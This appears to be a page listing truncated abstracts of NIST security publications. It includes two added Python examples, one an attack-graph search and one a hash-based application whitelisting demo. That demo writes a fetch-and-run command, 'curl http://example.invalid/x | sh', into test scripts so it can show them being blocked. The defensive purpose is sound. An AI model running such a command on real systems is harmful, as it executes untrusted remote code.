The article focuses on the tier 3 security risks related to the operation and use of cloud-based information systems. To prevent and mitigate any threats, adverse actions, service disruptions, attacks, or compromises, organizations need to quantify their
Integrating software developed by third-party organizations into a larger system raises concerns about the software's quality, origin, functionality, security, and interoperability. Addressing these concerns requires rethinking the roles of software's
Goncalo Martins, Sajal Bhatia, Xenofon Koutsoukos, Keith A. Stouffer, CheeYee Tang, Rick Candell
Cyber-Physical Systems (CPS) are systems with seamless integration of physical, computational and networking components. These systems can potentially have an impact on the physical components, hence it is critical to safeguard them against a wide range of
Richard Candell, Timothy A. Zimmerman, Keith A. Stouffer
The National Institute of Standards and Technology (NIST) is developing a cybersecurity performance testbed for industrial control systems. The goal of the testbed is to measure the performance of industrial control systems (ICS) when instrumented with
Stephen D. Quinn, Murugiah P. Souppaya, Melanie Cook, Karen Scarfone
[Superseded by SP 800-70 Rev. 3 (December 2015, updated 12/8/2016): https://www.nist.gov/node/1125056?pubid=922414 ] A security configuration checklist is a document that contains instructions or procedures for configuring an information technology (IT)
Michael Bartock, Murugiah Souppaya, Raghuram Yeluri, Uttam Shetty, James Greene, Steve Orrin, Hemma Prafullchandra, John McLeese, Jason Mills, Daniel Carayiannis, Tarik Williams, Karen Scarfone
This publication explains selected security challenges involving Infrastructure as a Service (IaaS) cloud computing technologies and geolocation. It then describes a proof of concept implementation that was designed to address those challenges. The
Victoria Y. Pillitteri, Larry Feldman, Gregory A. Witte
This bulletin summarizes the information presented in NIST SP 800-82, Rev 2: Guide to Industrial Control Systems (ICS) Security written by Keith Stouffer, Victoria Pillitteri, Suzanne Lightman, Marshall Abrams and Adam Hahn. The publication provides
An attack graph is a data structure representing how an attacker can chain together multiple attacks to expand their influence within a network (often in an attempt to reach some set of goal states). Restricting attack graph size is vital for the execution
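As an added illustration of the data structure described above (example code written for this page, not from the cited paper), the graph below encodes attacker states as (host, privilege) pairs and exploit steps as directed edges. A breadth-first search returns the shortest chain of exploits to a goal state, and a depth bound is the simplest form of the size restriction the abstract mentions. The network, host names and exploit labels are all constructed for the example.

```python
from collections import deque

# Constructed example network: (from_state, to_state, exploit label).
# States are (host, privilege) pairs; every host, exploit and edge here is hypothetical.
EXPLOITS = [
    (("internet", "none"), ("web", "user"), "remote code execution on web tier"),
    (("web", "user"), ("web", "root"), "local privilege escalation"),
    (("web", "root"), ("db", "user"), "reused database credentials"),
    (("web", "user"), ("app", "user"), "ssh key left on web host"),
    (("app", "user"), ("db", "user"), "application service account"),
    (("db", "user"), ("db", "root"), "database privilege escalation"),
]


def build_graph(exploits):
    """Adjacency list: state -> [(next_state, exploit_label), ...]."""
    graph = {}
    for src, dst, label in exploits:
        graph.setdefault(src, []).append((dst, label))
        graph.setdefault(dst, [])
    return graph


def shortest_attack_path(graph, start, goals, max_depth=None):
    """BFS from start; returns the shortest list of exploit labels that reaches
    any goal state, or None. max_depth bounds how many exploit steps are
    explored, which caps the part of the attack graph that is materialized."""
    queue = deque([(start, [])])
    seen = {start}
    while queue:
        state, path = queue.popleft()
        if state in goals:
            return path
        if max_depth is not None and len(path) >= max_depth:
            continue
        for nxt, label in graph.get(state, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, path + [label]))
    return None


def reachable_states(graph, start, max_depth=None):
    """All attacker states reachable within max_depth exploit steps.
    Useful for measuring how much of the graph a depth bound keeps."""
    reached = {start: 0}
    queue = deque([start])
    while queue:
        state = queue.popleft()
        depth = reached[state]
        if max_depth is not None and depth >= max_depth:
            continue
        for nxt, _ in graph.get(state, []):
            if nxt not in reached:
                reached[nxt] = depth + 1
                queue.append(nxt)
    return set(reached)


if __name__ == "__main__":
    g = build_graph(EXPLOITS)
    start = ("internet", "none")
    goal = {("db", "root")}
    print("full search:", shortest_attack_path(g, start, goal))
    print("depth 3 only:", shortest_attack_path(g, start, goal, max_depth=3))
    print("states within 2 steps:", len(reachable_states(g, start, max_depth=2)))
```

Bounding depth is only one pruning strategy; the same traversal works with any predicate that decides whether an edge is worth expanding (for example, ignoring exploits whose preconditions are already satisfied by a state of higher privilege on the same host).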
At the start of the 21st century, the National Institute of Standards and Technology (NIST) began the task of providing cryptographic key management guidance, which includes defining and implementing appropriate key management procedures, using algorithms
Enterprise networks are migrating to the public cloud to acquire computing resources for a number of promising benefits in terms of efficiency, expense, and flexibility. Except some public services, the enterprise network islands in cloud are expected to be
An application whitelist is a list of applications and application components that are authorized for use in an organization. Application whitelisting technologies use whitelists to control which applications are permitted to execute on a host. This helps
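The following is an added example (written for this page, not code from the NIST publication) of the decision an application whitelisting technology makes before letting a program execute: the whitelist maps each authorized executable to the SHA-256 digest of its contents, and anything that is not on the list, or whose contents no longer match, is denied by default. The file names and contents are constructed in a temporary directory so the example runs offline.

```python
import hashlib
import hmac
import os
import tempfile


def sha256_file(path):
    """Hex SHA-256 of a file's contents, read in chunks so large binaries are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def is_execution_allowed(path, whitelist):
    """whitelist maps absolute executable path -> expected SHA-256 hex digest.
    Deny by default: an unknown path or a digest mismatch returns False.
    Matching on the digest, not just the path, means replacing an authorized
    binary with a modified one does not inherit its authorization."""
    expected = whitelist.get(os.path.abspath(path))
    if expected is None:
        return False
    return hmac.compare_digest(expected, sha256_file(path))


def demo():
    """Constructed scenario: one authorized script, one unknown script, then the
    authorized script is tampered with. Returns the three allow/deny decisions."""
    with tempfile.TemporaryDirectory() as d:
        good = os.path.join(d, "backup.sh")
        with open(good, "wb") as f:
            f.write(b"#!/bin/sh\ntar czf /backup/home.tgz /home\n")  # constructed content
        rogue = os.path.join(d, "dropper.sh")
        with open(rogue, "wb") as f:
            f.write(b"#!/bin/sh\ncurl http://example.invalid/x | sh\n")  # constructed content

        # Build the whitelist from the known-good state of the authorized script.
        whitelist = {os.path.abspath(good): sha256_file(good)}

        allowed_before = is_execution_allowed(good, whitelist)   # True
        unknown_script = is_execution_allowed(rogue, whitelist)  # False: not listed

        # Simulate tampering: append a line to the authorized script.
        with open(good, "ab") as f:
            f.write(b"curl http://example.invalid/x | sh\n")
        allowed_after = is_execution_allowed(good, whitelist)    # False: digest changed

        return allowed_before, unknown_script, allowed_after


if __name__ == "__main__":
    print(demo())
```

A path-only whitelist would have returned True for the tampered script; binding the entry to a digest is what makes the list resistant to an attacker who can write to an authorized location. The cost is that every legitimate update to a listed program requires updating its digest.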
Ronald S. Ross, Kelley L. Dempsey, Larry Feldman, Gregory A. Witte
This bulletin summarizes the information presented in NIST SP 800-171: Protecting Controlled Unclassified Information in Nonfederal Information Systems and Organizations. The publication covers the protection of Controlled Unclassified Information (CUI) while
Modern-day attackers tend to use sophisticated multi-stage/multi-host attack techniques and anti-forensics tools to cover their attack traces. Due to the current limitations of intrusion detection and forensic analysis tools, reconstructing attack
Cyber attacks inevitably generate impacts towards relevant missions. However, concrete methods to accurately evaluate such impacts are rare. In this paper, we propose a probabilistic approach based on Bayesian networks for quantitative mission impact
J. Aspnes, Z. Diamadi, A. Yampolskiy, K. Gjosteen, Rene Peralta
We introduce a new cryptographic primitive called a blind coupon mechanism (BCM). In effect, a BCM is an authenticated bit commitment scheme, which is AND-homomorphic. We show that a BCM has natural and important applications. In particular, we use it to
Morris J. Dworkin, Larry Feldman, Gregory A. Witte
This bulletin summarizes the information presented in FIPS 202. The publication specifies the Secure Hash Algorithm-3 (SHA-3) family of functions on binary data. Each of the SHA-3 functions is based on an instance of the KECCAK algorithm that NIST selected
We consider the multiplicative complexity of Boolean functions with multiple bits of output, studying how large a multiplicative complexity is necessary and sufficient to provide a desired nonlinearity. For so-called $\Sigma\Pi\Sigma$ circuits, we show
Random numbers are essential for cryptography. In most real-world systems, these values come from a cryptographic pseudorandom number generator (PRNG), which in turn is seeded by an entropy source. The security of the entire cryptographic system then
Patrick D. O'Reilly, Gregory A. Witte, Larry Feldman
Title III of the E-Government Act of 2002, entitled the Federal Information Security Management Act (FISMA) of 2002, requires NIST to prepare an annual public report on activities undertaken in the previous year, and planned for the coming year, to carry
This bulletin summarizes the information presented in NIST SP 800-90A, Revision 1. The publication specifies mechanisms for the generation of random bits using deterministic methods. The methods provided are based on either hash functions or block cipher
We study the relationship between two measures of Boolean functions; "algebraic thickness" and "normality". For a function f, the algebraic thickness is a variant of the "sparsity", the number of nonzero coefficients in the unique $\mathbb{F}_2$ polynomial
National Institute of Standards and Technology (NIST), Quynh Dang
This standard specifies hash algorithms that can be used to generate digests of messages. The digests are used to detect whether messages have been changed since the digests were generated. The Applicability Clause of this standard was revised to
National Institute of Standards and Technology (NIST), Morris J. Dworkin
This Standard specifies the Secure Hash Algorithm-3 (SHA-3) family of functions on binary data. Each of the SHA-3 functions is based on an instance of the KECCAK algorithm that NIST selected as the winner of the SHA-3 Cryptographic Hash Algorithm